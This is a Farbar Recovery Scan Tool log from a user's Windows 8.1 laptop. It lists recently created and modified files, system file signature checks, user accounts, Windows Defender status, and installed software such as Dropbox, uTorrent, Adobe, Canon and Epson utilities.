2017-08-13 09:30 - 2017-08-13 09:30 - 000000000 ____D C:\Users\Ligaya\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-08-09 13:24 - 2017-07-21 21:40 - 000518144 _____ C:\WINDOWS\SysWOW64\msjetoledb40.dll
2017-08-09 13:24 - 2017-07-21 21:40 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjtes40.dll
2017-08-09 13:24 - 2017-07-14 14:49 - 025733632 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-08-09 13:24 - 2017-07-14 13:35 - 005981184 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2017-08-09 13:24 - 2017-07-14 12:40 - 015254016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-08-09 13:24 - 2017-07-14 10:54 - 020270080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-08-09 13:24 - 2017-07-14 10:17 - 004546048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2017-08-09 13:24 - 2017-07-09 03:12 - 004169728 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2017-08-09 13:24 - 2017-07-09 01:45 - 007078912 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll
2017-08-09 13:24 - 2017-07-09 01:05 - 003631616 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-08-09 13:24 - 2017-07-09 00:39 - 005274624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll
2017-08-09 13:24 - 2017-07-09 00:37 - 007797248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-08-09 13:24 - 2017-07-09 00:23 - 002749952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-08-09 13:24 - 2017-07-08 23:59 - 005270016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000616448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrepl40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000375808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspbde40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000343552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000339968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd2x40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstext40.dll
2017-08-09 13:24 - 2017-07-01 21:47 - 000240640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll
2017-08-09 13:24 - 2017-06-13 16:22 - 001436160 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2017-08-09 13:24 - 2017-06-13 15:50 - 001547264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2017-08-09 13:24 - 2017-06-12 04:02 - 002778112 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2017-08-09 13:24 - 2017-06-12 03:52 - 002463744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2017-08-09 13:24 - 2017-06-08 09:48 - 002457936 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-08-09 13:24 - 2017-05-28 00:42 - 001115136 _____ (Microsoft Corporation) C:\WINDOWS\system32\termsrv.dll
2017-08-09 13:23 - 2017-08-02 11:17 - 000107520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-08-09 13:23 - 2017-07-15 18:10 - 000536688 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-08-09 13:23 - 2017-07-15 18:10 - 000140016 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2017-08-09 13:23 - 2017-07-15 18:06 - 000449840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2017-08-09 13:23 - 2017-07-15 18:06 - 000136832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2017-08-09 13:23 - 2017-07-15 04:08 - 000037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\werdiagcontroller.dll
2017-08-09 13:23 - 2017-07-15 02:44 - 000033280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werdiagcontroller.dll
2017-08-09 13:23 - 2017-07-14 14:44 - 000576512 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-08-09 13:23 - 2017-07-14 14:19 - 000817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll
2017-08-09 13:23 - 2017-07-14 13:26 - 001033216 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2017-08-09 13:23 - 2017-07-14 13:10 - 000806912 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-08-09 13:23 - 2017-07-14 12:23 - 003240960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-08-09 13:23 - 2017-07-14 12:07 - 001545728 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-08-09 13:23 - 2017-07-14 11:58 - 000800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-08-09 13:23 - 2017-07-14 10:48 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-08-09 13:23 - 2017-07-14 10:38 - 000663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2017-08-09 13:23 - 2017-07-14 10:17 - 000880640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
2017-08-09 13:23 - 2017-07-14 10:12 - 000693248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-08-09 13:23 - 2017-07-14 10:09 - 013663744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-08-09 13:23 - 2017-07-14 09:53 - 002767872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-08-09 13:23 - 2017-07-14 09:50 - 001314816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2017-08-09 13:23 - 2017-07-14 09:48 - 000710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-08-09 13:23 - 2017-07-09 04:14 - 000376672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2017-08-09 13:23 - 2017-07-08 11:46 - 000377688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volmgrx.sys
2017-08-09 13:23 - 2017-07-08 11:16 - 007440728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-08-09 13:23 - 2017-07-08 11:16 - 001674520 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-08-09 13:23 - 2017-07-08 11:16 - 001534072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-08-09 13:23 - 2017-07-08 11:16 - 001499920 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-08-09 13:23 - 2017-07-08 11:16 - 001370328 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-08-09 13:23 - 2017-07-08 11:16 - 000086360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-08-09 13:23 - 2017-07-01 21:47 - 000866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswdat10.dll
2017-08-09 13:23 - 2017-07-01 21:47 - 000641536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mswstr10.dll
2017-08-09 13:23 - 2017-07-01 21:47 - 000144896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjint40.dll
2017-08-09 13:23 - 2017-07-01 21:47 - 000083968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjter40.dll
2017-08-09 13:23 - 2017-06-25 00:46 - 000424448 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprapi.dll
2017-08-09 13:23 - 2017-06-25 00:16 - 000352768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprapi.dll
2017-08-09 13:23 - 2017-06-15 22:17 - 002551808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-08-09 13:23 - 2017-06-15 22:16 - 001920000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-08-09 13:23 - 2017-06-14 01:51 - 000324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2017-08-09 13:23 - 2017-06-14 01:23 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dnsapi.dll
2017-08-09 13:23 - 2017-06-14 01:19 - 000383488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlansec.dll
2017-08-09 13:23 - 2017-06-14 01:16 - 000024064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfdprov.dll
2017-08-09 13:23 - 2017-06-14 01:11 - 000238080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2017-08-09 13:23 - 2017-06-14 01:07 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanmsm.dll
2017-08-09 13:23 - 2017-06-13 22:17 - 000656384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsapi.dll
2017-08-09 13:23 - 2017-06-13 22:16 - 000252416 _____ (Microsoft Corporation) C:\WINDOWS\system32\dnsrslvr.dll
2017-08-09 13:23 - 2017-06-13 17:47 - 000445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2017-08-09 13:23 - 2017-06-13 17:09 - 000445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2017-08-09 13:23 - 2017-06-13 16:16 - 000445952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2017-08-09 13:23 - 2017-06-13 16:10 - 000028672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2017-08-09 13:23 - 2017-06-13 16:07 - 000301568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityService.dll
2017-08-09 13:23 - 2017-06-13 16:03 - 000302080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2017-08-09 13:23 - 2017-06-13 15:54 - 000374272 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2017-08-09 13:23 - 2017-06-12 08:14 - 000276320 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys
2017-08-09 13:23 - 2017-06-12 04:13 - 000301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\umrdp.dll
2017-08-09 13:23 - 2017-06-12 04:11 - 000346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\SessEnv.dll
2017-08-09 13:23 - 2017-06-12 04:02 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SessEnv.dll
2017-08-09 13:23 - 2017-06-09 21:47 - 000448629 _____ C:\WINDOWS\system32\ApnDatabase.xml
2017-08-09 13:23 - 2017-06-09 01:01 - 001737600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2017-08-09 13:23 - 2017-06-09 01:01 - 001502000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2017-08-09 13:23 - 2017-06-07 12:25 - 000428888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2017-08-09 13:23 - 2017-06-07 02:38 - 000607232 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2017-08-09 13:23 - 2017-06-07 01:44 - 000530432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2017-08-09 13:23 - 2017-05-28 00:38 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdsdwmdr.dll
2017-08-09 10:18 - 2017-08-11 10:46 - 000000307 _____ C:\Users\Ligaya\Desktop\Yes I Travel.txt
2017-08-06 11:48 - 2017-08-06 11:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bluetooth Devices
2017-08-05 20:31 - 2017-08-18 16:44 - 000000000 ____D C:\Users\Ligaya\AppData\LocalLow\uTorrent
2017-07-31 09:30 - 2017-07-31 09:30 - 000226989 _____ C:\Users\Ligaya\Desktop\document-checklist.pdf
2017-07-29 10:56 - 2017-07-29 10:56 - 000000000 ____D C:\Users\Ligaya\Desktop\Blog Media Kit
2017-07-29 08:30 - 2017-08-04 11:01 - 000013285 _____ C:\Users\Ligaya\Desktop\UK visa.txt
2017-07-24 17:02 - 2017-07-24 17:03 - 001562366 _____ C:\Users\Ligaya\Desktop\Travel Young Batanes packages.zip
2017-07-24 09:19 - 2017-08-16 22:57 - 000000951 _____ C:\Users\Ligaya\Desktop\Winter-Instagram-Set - Shortcut.lnk
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-08-19 07:39 - 2014-12-11 13:23 - 000000000 ____D C:\Users\Ligaya
2017-08-19 07:20 - 2013-08-22 22:45 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-19 07:20 - 2013-08-22 21:25 - 000524288 ___SH C:\WINDOWS\system32\config\BBI
2017-08-19 07:19 - 2015-12-09 22:03 - 000003016 _____ C:\Users\Ligaya\Desktop\TRAVEL.txt
2017-08-19 07:18 - 2015-06-16 14:50 - 000000932 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004UA.job
2017-08-19 07:14 - 2013-03-19 12:18 - 000000000 ____D C:\Program Files (x86)\Dell Backup and Recovery
2017-08-19 06:51 - 2013-11-13 07:01 - 000000914 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1002UA.job
2017-08-19 03:53 - 2015-04-01 07:09 - 000000000 ___DO C:\Users\Ligaya\OneDrive
2017-08-19 02:19 - 2014-12-11 13:29 - 000003600 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1090255531-1958037965-2896169239-1004
2017-08-19 02:06 - 2014-12-11 13:39 - 000003914 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{A00539B4-377F-40D3-A2B9-B62AE3D1351C}
2017-08-19 01:06 - 2013-08-22 21:36 - 000000000 ____D C:\WINDOWS\Inf
2017-08-18 22:34 - 2013-08-22 23:36 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-18 21:22 - 2014-09-24 15:20 - 000865408 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-18 19:54 - 2014-12-13 11:27 - 000000000 ____D C:\Users\Ligaya\AppData\Roaming\vlc
2017-08-18 16:44 - 2014-12-11 18:55 - 000000000 ____D C:\Users\Ligaya\AppData\Roaming\uTorrent
2017-08-18 14:51 - 2013-11-13 07:01 - 000000862 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1002Core.job
2017-08-18 13:18 - 2015-06-16 14:50 - 000000880 _____ C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1090255531-1958037965-2896169239-1004Core.job
2017-08-18 12:22 - 2017-05-17 12:10 - 000003640 _____ C:\WINDOWS\System32\Tasks\G2MUploadTask-S-1-5-21-1090255531-1958037965-2896169239-1004
2017-08-18 12:22 - 2017-05-17 12:10 - 000003544 _____ C:\WINDOWS\System32\Tasks\G2MUpdateTask-S-1-5-21-1090255531-1958037965-2896169239-1004
2017-08-18 12:16 - 2014-12-11 13:46 - 000002217 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-18 12:16 - 2014-12-11 13:46 - 000002205 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-08-18 00:35 - 2013-09-05 10:45 - 000544424 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-08-13 10:35 - 2013-08-22 23:36 - 000000000 ____D C:\WINDOWS\rescache
2017-08-13 09:32 - 2015-11-01 03:50 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-08-13 09:30 - 2014-12-11 14:02 - 000000000 ____D C:\Users\Ligaya\AppData\Roaming\Dropbox
2017-08-10 08:54 - 2013-08-22 23:36 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-10 06:56 - 2015-11-01 03:51 - 000004476 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2017-08-09 20:32 - 2013-08-22 22:44 - 000855176 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-09 15:57 - 2012-07-26 15:59 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-08-09 15:52 - 2014-04-18 12:17 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-08-09 15:47 - 2014-04-18 12:17 - 140394280 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-08-09 12:54 - 2013-09-01 15:44 - 000004288 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-08-09 12:54 - 2013-08-22 23:36 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-08-09 12:54 - 2013-08-22 23:36 - 000000000 ____D C:\WINDOWS\system32\Macromed
2017-08-01 20:17 - 2016-11-02 19:28 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-08-01 20:17 - 2013-09-01 15:43 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-08-01 14:15 - 2016-11-03 11:14 - 000000000 ____D C:\Users\Ligaya\AppData\LocalLow\Mozilla
2017-07-29 08:03 - 2017-06-16 08:32 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-07-29 08:03 - 2017-06-16 08:32 - 000177648 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-07-25 09:29 - 2014-12-28 11:30 - 000000132 _____ C:\Users\Ligaya\AppData\Roaming\Adobe PNG Format CS5 Prefs
 
==================== Files in the root of some directories =======
 
2014-12-28 11:30 - 2017-07-25 09:29 - 000000132 _____ () C:\Users\Ligaya\AppData\Roaming\Adobe PNG Format CS5 Prefs
2016-01-12 22:46 - 2017-06-15 16:04 - 000003072 _____ () C:\Users\Ligaya\AppData\Roaming\Photobook Designer Prefsv3
2015-05-18 05:14 - 2015-05-18 05:14 - 000000000 _____ () C:\Users\Ligaya\AppData\Local\{196D05A2-5FC9-4022-9799-D2FA56C73EE7}
2015-05-18 19:06 - 2015-05-18 19:06 - 000000000 _____ () C:\Users\Ligaya\AppData\Local\{B448E2D0-9A12-478D-BDDC-F5BC23D3691D}
2017-08-19 07:49 - 2017-08-19 07:49 - 000048706 _____ () C:\ProgramData\agent.1503100178.bdinstall.bin
2017-08-19 08:28 - 2017-08-19 08:28 - 000030126 _____ () C:\ProgramData\agent.uninstall.1503102514.bdinstall.bin
2017-08-19 07:51 - 2017-08-19 07:51 - 000030578 _____ () C:\ProgramData\agent.update.1503100260.bdinstall.bin
 
Some files in TEMP:
====================
2014-12-11 13:03 - 2014-12-11 13:03 - 000043008 _____ () C:\Users\Gaya\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpgvqfk0.dll
2015-12-07 15:01 - 2015-12-07 15:01 - 000071168 _____ () C:\Users\Ligaya\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmplpkrmp.dll
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2017-08-19 02:19
 
==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 18-08-2017
Ran by Ligaya (19-08-2017 09:23:45)
Running from C:\Users\Ligaya\Desktop
Windows 8.1 Single Language (Update) (X64) (2014-12-09 02:48:08)
Boot Mode: Safe Mode (with Networking)
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1090255531-1958037965-2896169239-500 - Administrator - Disabled)
Guest (S-1-5-21-1090255531-1958037965-2896169239-501 - Limited - Disabled)
Ligaya (S-1-5-21-1090255531-1958037965-2896169239-1004 - Administrator - Enabled) => C:\Users\Ligaya
UpdatusUser (S-1-5-21-1090255531-1958037965-2896169239-1001 - Limited - Enabled) => C:\Users\UpdatusUser
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\uTorrent) (Version: 3.4.2.34944 - BitTorrent Inc.)
µTorrent (HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\uTorrent) (Version: 3.5.0.43916 - BitTorrent Inc.)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.012.20095 - Adobe Systems Incorporated)
Adobe Acrobat X Pro - English, Français, Deutsch (HKLM-x32\...\{AC76BA86-1033-F400-7760-000000000005}) (Version: 10.1.16 - Adobe Systems)
Adobe Flash Player 26 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 26.0.0.151 - Adobe Systems Incorporated)
Apple Application Support (HKLM-x32\...\{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}) (Version: 3.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}) (Version: 8.0.5.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Canon PowerShot ELPH 330 HS_IXUS 255 HS Camera User Guide (HKLM-x32\...\CameraUserGuide-PSELPH330HS_IXUS255HS) (Version: 1.0.0.1 - Canon Inc.)
Canon Utilities CameraWindow DC 8 (HKLM-x32\...\CameraWindowDC) (Version: 8.10.0.16 - Canon Inc.)
Canon Utilities ImageBrowser EX (HKLM-x32\...\ImageBrowser EX) (Version: 1.5.0.6 - Canon Inc.)
Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.23.47 - Canon Inc.)
Citrix Online Launcher (HKLM-x32\...\{48947098-A67C-46D4-90C5-9F2F6F0F96FE}) (Version: 1.0.449 - Citrix)
Citrix Online Launcher (HKLM-x32\...\{75B8A55E-0762-4676-AAC0-6FDF025B034B}) (Version: 1.0.220 - Citrix)
CM Installer (HKLM-x32\...\{E8F42777-958D-4C14-9A42-8DCA1929FD26}) (Version: 1.0.0.0 - Cyanogen Inc.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery - Support Software (HKLM-x32\...\{A9668246-FB70-4103-A1E3-66C9BC2EFB49}) (Version: 1.5.0.0 - Dell Inc.)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.5.0.0 - Dell Inc.)
Dell Digital Delivery (HKLM-x32\...\{D9ED3EFC-AB00-4CE0-ADED-80EE6B1158A7}) (Version: 2.2.2000.0 - Dell Products, LP)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 16.2.12.13 - Synaptics Incorporated)
Digiprint Photobooks V3.5 (HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Digiprint Photobooks V3.5) (Version: Digiprint Photobooks V3.5 3.5.0 - LBC IMAGING NETWORK INC)
Dropbox (HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Dropbox) (Version: 2.10.52 - Dropbox, Inc.)
Dropbox (HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Dropbox) (Version: 32.4.23 - Dropbox, Inc.)
Epson Event Manager (HKLM-x32\...\{C9AC7ED6-FD1C-4E83-8553-ECF8BCA111E8}) (Version: 3.01.0007 - Seiko Epson Corporation)
EPSON L210 Series Printer Uninstall (HKLM\...\EPSON L210 Series) (Version:  - SEIKO EPSON Corporation)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
Epson User's Guide L210 Series (HKLM-x32\...\L210 Series Useg) (Version:  - )
Extended Asian Language font pack for Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-2530-0000-AC0F074E4100}) (Version: 15.007.20033 - Adobe Systems Incorporated)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.101 - Google Inc.)
Google Chrome (HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Google Chrome) (Version: 39.0.2171.95 - Google Inc.)
Google Photos Backup (HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Google Photos Backup) (Version: 1.1.2.13 - Google, Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
GoToMeeting 7.0.4.2033 (HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\GoToMeeting) (Version: 7.0.4.2033 - CitrixOnline)
HL-L2360D series (HKLM-x32\...\{46B58839-2405-48D6-A59D-F8246158A6ED}) (Version: 1.0.1.0 - Brother Industries, Ltd.)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel® PROSet/Wireless Software for Bluetooth® Technology (HKLM\...\{0728A184-F899-4356-B93D-8228674F0DEB}) (Version: 2.6.1209.0268 - Motorola Solutions, Inc.)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.5.0.1207 - Intel Corporation)
Intel® Turbo Boost Technology Monitor 2.6 (HKLM\...\{6C9365EB-1F9E-4893-9196-3EC77C88D0C5}) (Version: 2.6.2.0 - Intel)
Intel® PROSet/Wireless Software (HKLM-x32\...\{c9967fbd-e3c3-4ed0-992a-5b33260f2944}) (Version: 16.1.5 - Intel Corporation)
iTunes (HKLM\...\{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}) (Version: 12.0.1.26 - Apple Inc.)
Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)
Java SE Development Kit 8 Update 25 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0180250}) (Version: 8.0.250.18 - Oracle Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4734.1000 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\OneDriveSetup.exe) (Version: 17.0.4029.0217 - Microsoft Corporation)
